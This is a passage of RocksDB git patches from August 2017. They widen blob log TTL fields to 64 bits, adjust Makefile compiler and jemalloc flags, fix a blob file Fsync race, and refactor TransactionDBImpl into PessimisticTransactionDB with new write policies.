nullptr; } BlobLogHeader& operator=(BlobLogHeader&& in) noexcept; }; @@ -128,11 +130,11 @@ class BlobLogFooter { // footer size = 4 byte magic number // 8 bytes count - // 4, 4 - ttl range + // 8, 8 - ttl range // 8, 8 - sn range // 8, 8 - ts range - // = 56 - static const size_t kFooterSize = 4 + 4 + 8 + (4 * 2) + (8 * 2) + (8 * 2); + // = 64 + static const size_t kFooterSize = 4 + 4 + 8 + (8 * 2) + (8 * 2) + (8 * 2); bool HasTTL() const { return !!ttl_range_; } @@ -185,7 +187,7 @@ class BlobLogRecord { uint32_t key_size_; uint64_t blob_size_; uint64_t time_val_; - uint32_t ttl_val_; + uint64_t ttl_val_; SequenceNumber sn_; uint32_t footer_cksum_; char type_; @@ -209,11 +211,12 @@ class BlobLogRecord { public: // Header is // Key Length ( 4 bytes ), - // Blob Length ( 8 bytes), timestamp/ttl (8 bytes), + // Blob Length ( 8 bytes), + // ttl (8 bytes), timestamp (8 bytes), // type (1 byte), subtype (1 byte) // header checksum (4 bytes), blob checksum (4 bytes), - // = 34 - static const size_t kHeaderSize = 4 + 4 + 4 + 8 + 4 + 8 + 1 + 1; + // = 42 + static const size_t kHeaderSize = 4 + 4 + 8 + 8 + 4 + 8 + 1 + 1; static const size_t kFooterSize = 8 + 4; @@ -234,7 +237,7 @@ class BlobLogRecord { return ttl_val_ != std::numeric_limits::max(); } - uint32_t GetTTL() const { return ttl_val_; } + uint64_t GetTTL() const { return ttl_val_; } uint64_t GetTimeVal() const { return time_val_; } diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc index 1ffc74a4299..0a049b75c69 100644 --- a/utilities/blob_db/blob_log_writer.cc +++ b/utilities/blob_db/blob_log_writer.cc @@ -8,7 +8,6 @@ #include "utilities/blob_db/blob_log_writer.h" #include -#include #include #include "rocksdb/env.h" #include "util/coding.h" @@ -72,7 +71,7 @@ Status Writer::AppendFooter(const BlobLogFooter& footer) { Status Writer::AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset, - uint32_t ttl) { + uint64_t ttl) { assert(block_offset_ != 0); assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); @@ -96,26 +95,23 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, } void Writer::ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, int32_t ttl, int64_t ts) { + const Slice& val, uint64_t ttl, int64_t ts) { headerbuf->reserve(BlobLogRecord::kHeaderSize); uint32_t key_size = static_cast(key.size()); PutFixed32(headerbuf, key_size); PutFixed64(headerbuf, val.size()); - uint32_t ttl_write = (ttl != -1) ? static_cast(ttl) - : std::numeric_limits::max(); - PutFixed32(headerbuf, ttl_write); - - uint64_t ts_write = (ts != -1) ? static_cast(ts) - : std::numeric_limits::max(); - PutFixed64(headerbuf, ts_write); + PutFixed64(headerbuf, ttl); + PutFixed64(headerbuf, ts); RecordType t = kFullType; headerbuf->push_back(static_cast(t)); RecordSubType st = kRegularType; - if (ttl != -1) st = kTTLType; + if (ttl != kNoExpiration) { + st = kTTLType; + } headerbuf->push_back(static_cast(st)); uint32_t header_crc = 0; diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h index b6c7a2a9901..a3c176ecbfe 100644 --- a/utilities/blob_db/blob_log_writer.h +++ b/utilities/blob_db/blob_log_writer.h @@ -41,13 +41,13 @@ class Writer { ~Writer(); static void ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, int32_t ttl, int64_t ts); + const Slice& val, uint64_t ttl, int64_t ts); Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, - uint64_t* blob_offset, uint32_t ttl); + uint64_t* blob_offset, uint64_t ttl); Status EmitPhysicalRecord(const std::string& headerbuf, const Slice& key, const Slice& val, uint64_t* key_offset, From 4f81ab38bf18aacdc5f2e2f2a82cf577989ae39b Mon Sep 17 00:00:00 2001 From: Cholerae Hu Date: Thu, 3 Aug 2017 20:55:01 -0700 Subject: [PATCH 076/205] Makefile: fix for GCC 7+ and clang 4+ Summary: maysamyabandeh IslamAbdelRahman PTAL Fix https://github.com/facebook/rocksdb/issues/2672 Signed-off-by: Cholerae Hu Closes https://github.com/facebook/rocksdb/pull/2681 Differential Revision: D5561515 Pulled By: ajkr fbshipit-source-id: 676187802ebd8a87a6c051bb565818a1bf89d0a9 --- Makefile | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/Makefile b/Makefile index a01c74e954e..fc413e1d66e 100644 --- a/Makefile +++ b/Makefile @@ -255,6 +255,19 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter +CCVERSION = $(shell $(CXX) -dumpversion) +CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") + +ifeq ($(CCNAME), clang) +ifeq ($(CCVERSION), 4*) + CXXFLAGS += -faligned-new +endif +else +ifeq ($(CCVERSION), 7) + CXXFLAGS += -faligned-new +endif +endif + ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror endif From dce6d5a8385456eaf52a3b16043129b424e0de9f Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 3 Aug 2017 21:30:37 -0700 Subject: [PATCH 077/205] db_bench background work thread pool size arguments Summary: The background thread pools' sizes weren't easily configurable by `max_background_compactions` and `max_background_flushes` in multi-instance setups. Introduced separate arguments for their sizes. Closes https://github.com/facebook/rocksdb/pull/2680 Differential Revision: D5550675 Pulled By: ajkr fbshipit-source-id: bab5f0a7bc5db63bb084d0c10facbe437096367d --- tools/db_bench_tool.cc | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index 6dfff771fc5..6f12390af70 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -322,6 +322,14 @@ DEFINE_int32(num_bottom_pri_threads, 0, "The number of threads in the bottom-priority thread pool (used " "by universal compaction only)."); +DEFINE_int32(num_high_pri_threads, 0, + "The maximum number of concurrent background compactions" + " that can occur in parallel."); + +DEFINE_int32(num_low_pri_threads, 0, + "The maximum number of concurrent background compactions" + " that can occur in parallel."); + DEFINE_int32(max_background_compactions, rocksdb::Options().max_background_compactions, "The maximum number of concurrent background compactions" @@ -5241,13 +5249,14 @@ int db_bench_tool(int argc, char** argv) { FLAGS_rep_factory = StringToRepFactory(FLAGS_memtablerep.c_str()); - // The number of background threads should be at least as much the - // max number of concurrent compactions. - FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions); - FLAGS_env->SetBackgroundThreads(FLAGS_max_background_flushes, + // Note options sanitization may increase thread pool sizes according to + // max_background_flushes/max_background_compactions/max_background_jobs + FLAGS_env->SetBackgroundThreads(FLAGS_num_high_pri_threads, rocksdb::Env::Priority::HIGH); FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads, rocksdb::Env::Priority::BOTTOM); + FLAGS_env->SetBackgroundThreads(FLAGS_num_low_pri_threads, + rocksdb::Env::Priority::LOW); // Choose a location for the test database if none given with --db= if (FLAGS_db.empty()) { From 627c9f1abb263ab8d2072a1ac9d30a6e4bc3dde4 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 4 Aug 2017 10:27:39 -0700 Subject: [PATCH 078/205] Don't add -ljemalloc when DISABLE_JEMALLOC is set Summary: fixes #2555 Closes https://github.com/facebook/rocksdb/pull/2684 Differential Revision: D5560527 Pulled By: maysamyabandeh fbshipit-source-id: 6e1d874ae0b4e699a77203d9d52d0bb8f59013b0 --- Makefile | 4 ++++ build_tools/build_detect_platform | 13 +++++++++++-- 2 files changed, 15 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index fc413e1d66e..ef42deecedd 100644 --- a/Makefile +++ b/Makefile @@ -232,6 +232,10 @@ ifndef DISABLE_JEMALLOC PLATFORM_CXXFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE PLATFORM_CCFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE endif + ifdef WITH_JEMALLOC_FLAG + PLATFORM_LDFLAGS += -ljemalloc + JAVA_LDFLAGS += -ljemalloc + endif EXEC_LDFLAGS := $(JEMALLOC_LIB) $(EXEC_LDFLAGS) PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE) PLATFORM_CCFLAGS += $(JEMALLOC_INCLUDE) diff --git a/build_tools/build_detect_platform b/build_tools/build_detect_platform index 440c6a5e39f..d040f21f517 100755 --- a/build_tools/build_detect_platform +++ b/build_tools/build_detect_platform @@ -317,9 +317,11 @@ EOF # Test whether jemalloc is available if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null -ljemalloc \ 2>/dev/null; then - PLATFORM_LDFLAGS="$PLATFORM_LDFLAGS -ljemalloc" - JAVA_LDFLAGS="$JAVA_LDFLAGS -ljemalloc" + # This will enable some preprocessor identifiers in the Makefile JEMALLOC=1 + # JEMALLOC can be enabled either using the flag (like here) or by + # providing direct link to the jemalloc library + WITH_JEMALLOC_FLAG=1 else # jemalloc is not available. Let's try tcmalloc if echo 'int main() {}' | $CXX $CFLAGS -x c++ - -o /dev/null \ @@ -517,7 +519,14 @@ echo "ROCKSDB_PATCH=$ROCKSDB_PATCH" >> "$OUTPUT" echo "CLANG_SCAN_BUILD=$CLANG_SCAN_BUILD" >> "$OUTPUT" echo "CLANG_ANALYZER=$CLANG_ANALYZER" >> "$OUTPUT" echo "PROFILING_FLAGS=$PROFILING_FLAGS" >> "$OUTPUT" +# This will enable some related identifiers for the preprocessor if test -n "$JEMALLOC"; then echo "JEMALLOC=1" >> "$OUTPUT" fi +# Indicates that jemalloc should be enabled using -ljemalloc flag +# The alternative is to porvide a direct link to the library via JEMALLOC_LIB +# and JEMALLOC_INCLUDE +if test -n "$WITH_JEMALLOC_FLAG"; then + echo "WITH_JEMALLOC_FLAG=$WITH_JEMALLOC_FLAG" >> "$OUTPUT" +fi echo "LUA_PATH=$LUA_PATH" >> "$OUTPUT" From 0d4a2b733070a1bd52f981313f9e17f126701407 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 4 Aug 2017 13:09:56 -0700 Subject: [PATCH 079/205] Avoid blob db call Sync() while writing Summary: The FsyncFiles background job call Fsync() periodically for blob files. However it can access WritableFileWriter concurrently with a Put() or Write(). And WritableFileWriter does not support concurrent access. It will lead to WritableFileWriter buffer being flush with same content twice, and blob file end up corrupted. Fixing by simply let FsyncFiles hold write_mutex_. Closes https://github.com/facebook/rocksdb/pull/2685 Differential Revision: D5561908 Pulled By: yiwu-arbug fbshipit-source-id: f0bb5bcab0e05694e053b8c49eab43640721e872 --- utilities/blob_db/blob_db_impl.cc | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f35bc4ac3f5..783c9d4ef1b 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -545,12 +545,7 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { std::string fpath(bfile->PathName()); std::unique_ptr wfile; - // We are having issue that we write duplicate blob to blob file and the bug - // is related to writable file buffer. Force no buffer until we fix the bug. - EnvOptions env_options = env_options_; - env_options.writable_file_max_buffer_size = 0; - - Status s = env_->ReopenWritableFile(fpath, &wfile, env_options); + Status s = env_->ReopenWritableFile(fpath, &wfile, env_options_); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to open blob file for write: %s status: '%s'" @@ -561,7 +556,7 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { } std::unique_ptr fwriter; - fwriter.reset(new WritableFileWriter(std::move(wfile), env_options)); + fwriter.reset(new WritableFileWriter(std::move(wfile), env_options_)); uint64_t boffset = bfile->GetFileSize(); if (debug_level_ >= 2 && boffset) { @@ -1570,6 +1565,8 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { std::pair BlobDBImpl::FsyncFiles(bool aborted) { if (aborted) return std::make_pair(false, -1); + MutexLock l(&write_mutex_); + std::vector> process_files; { ReadLock rl(&mutex_); From 20dc5e74f276bdcb26c44c13bced506a2d920d3f Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 4 Aug 2017 23:57:49 -0700 Subject: [PATCH 080/205] Optimize range-delete aggregator call in merge helper. Summary: In the condition: ``` if (range_del_agg != nullptr && range_del_agg->ShouldDelete( iter->key(), RangeDelAggregator::RangePositioningMode::kForwardTraversal) && filter != CompactionFilter::Decision::kRemoveAndSkipUntil) { ... } ``` it could be possible that all the work done in `range_del_agg->ShouldDelete` is wasted due to not having the right `filter` value later on. Instead, check `filter` value before even calling `range_del_agg->ShouldDelete`, which is a much more involved function. Closes https://github.com/facebook/rocksdb/pull/2690 Differential Revision: D5568931 Pulled By: sagar0 fbshipit-source-id: 17512d52360425c7ae9de7675383f5d7bc3dad58 --- db/merge_helper.cc | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/db/merge_helper.cc b/db/merge_helper.cc index 142486e5eb8..625de27c2b5 100644 --- a/db/merge_helper.cc +++ b/db/merge_helper.cc @@ -201,12 +201,11 @@ Status MergeHelper::MergeUntil(InternalIterator* iter, ikey.sequence <= latest_snapshot_ ? CompactionFilter::Decision::kKeep : FilterMerge(orig_ikey.user_key, value_slice); - if (range_del_agg != nullptr && - + if (filter != CompactionFilter::Decision::kRemoveAndSkipUntil && + range_del_agg != nullptr && range_del_agg->ShouldDelete( iter->key(), - RangeDelAggregator::RangePositioningMode::kForwardTraversal) && - filter != CompactionFilter::Decision::kRemoveAndSkipUntil) { + RangeDelAggregator::RangePositioningMode::kForwardTraversal)) { filter = CompactionFilter::Decision::kRemove; } if (filter == CompactionFilter::Decision::kKeep || From c9804e007a4e33349a796f0c2b70648e335b6827 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Sat, 5 Aug 2017 17:17:48 -0700 Subject: [PATCH 081/205] Refactor TransactionDBImpl Summary: This opens space for the new implementations of TransactionDBImpl such as WritePreparedTxnDBImpl that has a different policy of how to write to DB. Closes https://github.com/facebook/rocksdb/pull/2689 Differential Revision: D5568918 Pulled By: maysamyabandeh fbshipit-source-id: f7eac866e175daf3793ae79da108f65cc7dc7b25 --- CMakeLists.txt | 2 +- TARGETS | 3 +- include/rocksdb/utilities/transaction_db.h | 12 ++ src.mk | 2 +- ..._impl.cc => pessimistic_transaction_db.cc} | 128 ++++++++++++------ ...db_impl.h => pessimistic_transaction_db.h} | 57 ++++++-- utilities/transactions/transaction_impl.cc | 4 +- utilities/transactions/transaction_impl.h | 4 +- .../transactions/transaction_lock_mgr.cc | 4 +- utilities/transactions/transaction_lock_mgr.h | 4 +- .../write_prepared_transaction_impl.cc | 2 +- 11 files changed, 157 insertions(+), 65 deletions(-) rename utilities/transactions/{transaction_db_impl.cc => pessimistic_transaction_db.cc} (75%) rename utilities/transactions/{transaction_db_impl.h => pessimistic_transaction_db.h} (67%) diff --git a/CMakeLists.txt b/CMakeLists.txt index bd7a8fbe45f..8209f30fe91 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -520,7 +520,7 @@ set(SOURCES utilities/transactions/optimistic_transaction_db_impl.cc utilities/transactions/optimistic_transaction_impl.cc utilities/transactions/transaction_base.cc - utilities/transactions/transaction_db_impl.cc + utilities/transactions/pessimistic_transaction_db.cc utilities/transactions/transaction_db_mutex_impl.cc utilities/transactions/transaction_impl.cc utilities/transactions/transaction_lock_mgr.cc diff --git a/TARGETS b/TARGETS index f2aa661f38f..e52f507074f 100644 --- a/TARGETS +++ b/TARGETS @@ -247,11 +247,12 @@ cpp_library( "utilities/transactions/optimistic_transaction_db_impl.cc", "utilities/transactions/optimistic_transaction_impl.cc", "utilities/transactions/transaction_base.cc", - "utilities/transactions/transaction_db_impl.cc", + "utilities/transactions/pessimistic_transaction_db.cc", "utilities/transactions/transaction_db_mutex_impl.cc", "utilities/transactions/transaction_impl.cc", "utilities/transactions/transaction_lock_mgr.cc", "utilities/transactions/transaction_util.cc", + "utilities/transactions/write_prepared_transaction_impl.cc", "utilities/ttl/db_ttl_impl.cc", "utilities/write_batch_with_index/write_batch_with_index.cc", "utilities/write_batch_with_index/write_batch_with_index_internal.cc", diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index 259f50fe6a6..548518f6008 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -23,6 +23,12 @@ namespace rocksdb { class TransactionDBMutexFactory; +enum TxnDBWritePolicy { + WRITE_COMMITTED = 0, // write only the committed data + WRITE_PREPARED, // write data after the prepare phase of 2pc + WRITE_UNPREPARED // write data before the prepare phase of 2pc +}; + struct TransactionDBOptions { // Specifies the maximum number of keys that can be locked at the same time // per column family. @@ -66,6 +72,12 @@ struct TransactionDBOptions { // condition variable for all transaction locking instead of the default // mutex/condvar implementation. std::shared_ptr custom_mutex_factory; + + // The policy for when to write the data into the DB. The default policy is to + // write only the committed data (WRITE_COMMITTED). The data could be written + // before the commit phase. The DB then needs to provide the mechanisms to + // tell apart committed from uncommitted data. + TxnDBWritePolicy write_policy; }; struct TransactionOptions { diff --git a/src.mk b/src.mk index 0b0d4e6ab51..44c59fea7d4 100644 --- a/src.mk +++ b/src.mk @@ -195,7 +195,7 @@ LIB_SOURCES = \ utilities/transactions/optimistic_transaction_db_impl.cc \ utilities/transactions/optimistic_transaction_impl.cc \ utilities/transactions/transaction_base.cc \ - utilities/transactions/transaction_db_impl.cc \ + utilities/transactions/pessimistic_transaction_db.cc \ utilities/transactions/transaction_db_mutex_impl.cc \ utilities/transactions/transaction_impl.cc \ utilities/transactions/transaction_lock_mgr.cc \ diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/pessimistic_transaction_db.cc similarity index 75% rename from utilities/transactions/transaction_db_impl.cc rename to utilities/transactions/pessimistic_transaction_db.cc index bd43b585ac6..052dc80f730 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -5,7 +5,7 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include #include @@ -21,8 +21,8 @@ namespace rocksdb { -TransactionDBImpl::TransactionDBImpl(DB* db, - const TransactionDBOptions& txn_db_options) +PessimisticTransactionDB::PessimisticTransactionDB( + DB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), db_impl_(static_cast_with_check(db)), txn_db_options_(txn_db_options), @@ -34,9 +34,9 @@ TransactionDBImpl::TransactionDBImpl(DB* db, assert(db_impl_ != nullptr); } -// Support initiliazing TransactionDBImpl from a stackable db +// Support initiliazing PessimisticTransactionDB from a stackable db // -// TransactionDBImpl +// PessimisticTransactionDB // ^ ^ // | | // | + @@ -50,8 +50,8 @@ TransactionDBImpl::TransactionDBImpl(DB* db, // + // DB // -TransactionDBImpl::TransactionDBImpl(StackableDB* db, - const TransactionDBOptions& txn_db_options) +PessimisticTransactionDB::PessimisticTransactionDB( + StackableDB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), db_impl_(static_cast_with_check(db->GetRootDB())), txn_db_options_(txn_db_options), @@ -63,13 +63,13 @@ TransactionDBImpl::TransactionDBImpl(StackableDB* db, assert(db_impl_ != nullptr); } -TransactionDBImpl::~TransactionDBImpl() { +PessimisticTransactionDB::~PessimisticTransactionDB() { while (!transactions_.empty()) { delete transactions_.begin()->second; } } -Status TransactionDBImpl::Initialize( +Status PessimisticTransactionDB::Initialize( const std::vector& compaction_enabled_cf_indices, const std::vector& handles) { for (auto cf_ptr : handles) { @@ -121,7 +121,7 @@ Status TransactionDBImpl::Initialize( return s; } -Transaction* TransactionDBImpl::BeginTransaction( +Transaction* WriteCommittedTxnDB::BeginTransaction( const WriteOptions& write_options, const TransactionOptions& txn_options, Transaction* old_txn) { if (old_txn != nullptr) { @@ -132,7 +132,18 @@ Transaction* TransactionDBImpl::BeginTransaction( } } -TransactionDBOptions TransactionDBImpl::ValidateTxnDBOptions( +Transaction* WritePreparedTxnDB::BeginTransaction( + const WriteOptions& write_options, const TransactionOptions& txn_options, + Transaction* old_txn) { + if (old_txn != nullptr) { + ReinitializeTransaction(old_txn, write_options, txn_options); + return old_txn; + } else { + return new WritePreparedTxnImpl(this, write_options, txn_options); + } +} + +TransactionDBOptions PessimisticTransactionDB::ValidateTxnDBOptions( const TransactionDBOptions& txn_db_options) { TransactionDBOptions validated = txn_db_options; @@ -213,8 +224,19 @@ Status TransactionDB::WrapDB( DB* db, const TransactionDBOptions& txn_db_options, const std::vector& compaction_enabled_cf_indices, const std::vector& handles, TransactionDB** dbptr) { - TransactionDBImpl* txn_db = new TransactionDBImpl( - db, TransactionDBImpl::ValidateTxnDBOptions(txn_db_options)); + PessimisticTransactionDB* txn_db; + switch (txn_db_options.write_policy) { + case WRITE_UNPREPARED: + return Status::NotSupported("WRITE_UNPREPARED is not implemented yet"); + case WRITE_PREPARED: + txn_db = new WritePreparedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + break; + case WRITE_COMMITTED: + default: + txn_db = new WriteCommittedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + } *dbptr = txn_db; Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles); return s; @@ -227,8 +249,19 @@ Status TransactionDB::WrapStackableDB( StackableDB* db, const TransactionDBOptions& txn_db_options, const std::vector& compaction_enabled_cf_indices, const std::vector& handles, TransactionDB** dbptr) { - TransactionDBImpl* txn_db = new TransactionDBImpl( - db, TransactionDBImpl::ValidateTxnDBOptions(txn_db_options)); + PessimisticTransactionDB* txn_db; + switch (txn_db_options.write_policy) { + case WRITE_UNPREPARED: + return Status::NotSupported("WRITE_UNPREPARED is not implemented yet"); + case WRITE_PREPARED: + txn_db = new WritePreparedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + break; + case WRITE_COMMITTED: + default: + txn_db = new WriteCommittedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + } *dbptr = txn_db; Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles); return s; @@ -236,11 +269,12 @@ Status TransactionDB::WrapStackableDB( // Let TransactionLockMgr know that this column family exists so it can // allocate a LockMap for it. -void TransactionDBImpl::AddColumnFamily(const ColumnFamilyHandle* handle) { +void PessimisticTransactionDB::AddColumnFamily( + const ColumnFamilyHandle* handle) { lock_mgr_.AddColumnFamily(handle->GetID()); } -Status TransactionDBImpl::CreateColumnFamily( +Status PessimisticTransactionDB::CreateColumnFamily( const ColumnFamilyOptions& options, const std::string& column_family_name, ColumnFamilyHandle** handle) { InstrumentedMutexLock l(&column_family_mutex_); @@ -255,7 +289,8 @@ Status TransactionDBImpl::CreateColumnFamily( // Let TransactionLockMgr know that it can deallocate the LockMap for this // column family. -Status TransactionDBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) { +Status PessimisticTransactionDB::DropColumnFamily( + ColumnFamilyHandle* column_family) { InstrumentedMutexLock l(&column_family_mutex_); Status s = db_->DropColumnFamily(column_family); @@ -266,23 +301,24 @@ Status TransactionDBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) { return s; } -Status TransactionDBImpl::TryLock(PessimisticTxn* txn, uint32_t cfh_id, - const std::string& key, bool exclusive) { +Status PessimisticTransactionDB::TryLock(PessimisticTxn* txn, uint32_t cfh_id, + const std::string& key, + bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); } -void TransactionDBImpl::UnLock(PessimisticTxn* txn, - const TransactionKeyMap* keys) { +void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, + const TransactionKeyMap* keys) { lock_mgr_.UnLock(txn, keys, GetEnv()); } -void TransactionDBImpl::UnLock(PessimisticTxn* txn, uint32_t cfh_id, - const std::string& key) { +void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, uint32_t cfh_id, + const std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } // Used when wrapping DB write operations in a transaction -Transaction* TransactionDBImpl::BeginInternalTransaction( +Transaction* PessimisticTransactionDB::BeginInternalTransaction( const WriteOptions& options) { TransactionOptions txn_options; Transaction* txn = BeginTransaction(options, txn_options, nullptr); @@ -301,9 +337,9 @@ Transaction* TransactionDBImpl::BeginInternalTransaction( // sort its keys before locking them. This guarantees that TransactionDB write // methods cannot deadlock with eachother (but still could deadlock with a // Transaction). -Status TransactionDBImpl::Put(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key, const Slice& val) { +Status PessimisticTransactionDB::Put(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key, const Slice& val) { Status s; Transaction* txn = BeginInternalTransaction(options); @@ -322,9 +358,9 @@ Status TransactionDBImpl::Put(const WriteOptions& options, return s; } -Status TransactionDBImpl::Delete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) { +Status PessimisticTransactionDB::Delete(const WriteOptions& wopts, + ColumnFamilyHandle* column_family, + const Slice& key) { Status s; Transaction* txn = BeginInternalTransaction(wopts); @@ -344,9 +380,9 @@ Status TransactionDBImpl::Delete(const WriteOptions& wopts, return s; } -Status TransactionDBImpl::Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key, const Slice& value) { +Status PessimisticTransactionDB::Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key, const Slice& value) { Status s; Transaction* txn = BeginInternalTransaction(options); @@ -366,7 +402,8 @@ Status TransactionDBImpl::Merge(const WriteOptions& options, return s; } -Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { +Status PessimisticTransactionDB::Write(const WriteOptions& opts, + WriteBatch* updates) { // Need to lock all keys in this batch to prevent write conflicts with // concurrent transactions. Transaction* txn = BeginInternalTransaction(opts); @@ -385,19 +422,19 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { return s; } -void TransactionDBImpl::InsertExpirableTransaction(TransactionID tx_id, - PessimisticTxn* tx) { +void PessimisticTransactionDB::InsertExpirableTransaction(TransactionID tx_id, + PessimisticTxn* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); } -void TransactionDBImpl::RemoveExpirableTransaction(TransactionID tx_id) { +void PessimisticTransactionDB::RemoveExpirableTransaction(TransactionID tx_id) { std::lock_guard lock(map_mutex_); expirable_transactions_map_.erase(tx_id); } -bool TransactionDBImpl::TryStealingExpiredTransactionLocks( +bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks( TransactionID tx_id) { std::lock_guard lock(map_mutex_); @@ -409,7 +446,7 @@ bool TransactionDBImpl::TryStealingExpiredTransactionLocks( return tx.TryStealingLocks(); } -void TransactionDBImpl::ReinitializeTransaction( +void PessimisticTransactionDB::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { auto txn_impl = static_cast_with_check(txn); @@ -417,7 +454,7 @@ void TransactionDBImpl::ReinitializeTransaction( txn_impl->Reinitialize(this, write_options, txn_options); } -Transaction* TransactionDBImpl::GetTransactionByName( +Transaction* PessimisticTransactionDB::GetTransactionByName( const TransactionName& name) { std::lock_guard lock(name_map_mutex_); auto it = transactions_.find(name); @@ -428,7 +465,7 @@ Transaction* TransactionDBImpl::GetTransactionByName( } } -void TransactionDBImpl::GetAllPreparedTransactions( +void PessimisticTransactionDB::GetAllPreparedTransactions( std::vector* transv) { assert(transv); transv->clear(); @@ -440,11 +477,12 @@ void TransactionDBImpl::GetAllPreparedTransactions( } } -TransactionLockMgr::LockStatusData TransactionDBImpl::GetLockStatusData() { +TransactionLockMgr::LockStatusData +PessimisticTransactionDB::GetLockStatusData() { return lock_mgr_.GetLockStatusData(); } -void TransactionDBImpl::RegisterTransaction(Transaction* txn) { +void PessimisticTransactionDB::RegisterTransaction(Transaction* txn) { assert(txn); assert(txn->GetName().length() > 0); assert(GetTransactionByName(txn->GetName()) == nullptr); @@ -453,7 +491,7 @@ void TransactionDBImpl::RegisterTransaction(Transaction* txn) { transactions_[txn->GetName()] = txn; } -void TransactionDBImpl::UnregisterTransaction(Transaction* txn) { +void PessimisticTransactionDB::UnregisterTransaction(Transaction* txn) { assert(txn); std::lock_guard lock(name_map_mutex_); auto it = transactions_.find(txn->GetName()); diff --git a/utilities/transactions/transaction_db_impl.h b/utilities/transactions/pessimistic_transaction_db.h similarity index 67% rename from utilities/transactions/transaction_db_impl.h rename to utilities/transactions/pessimistic_transaction_db.h index dfc13fbd707..d9cf7d55867 100644 --- a/utilities/transactions/transaction_db_impl.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -17,25 +17,26 @@ #include "rocksdb/utilities/transaction_db.h" #include "utilities/transactions/transaction_impl.h" #include "utilities/transactions/transaction_lock_mgr.h" +#include "utilities/transactions/write_prepared_transaction_impl.h" namespace rocksdb { -class TransactionDBImpl : public TransactionDB { +class PessimisticTransactionDB : public TransactionDB { public: - explicit TransactionDBImpl(DB* db, - const TransactionDBOptions& txn_db_options); + explicit PessimisticTransactionDB(DB* db, + const TransactionDBOptions& txn_db_options); - explicit TransactionDBImpl(StackableDB* db, - const TransactionDBOptions& txn_db_options); + explicit PessimisticTransactionDB(StackableDB* db, + const 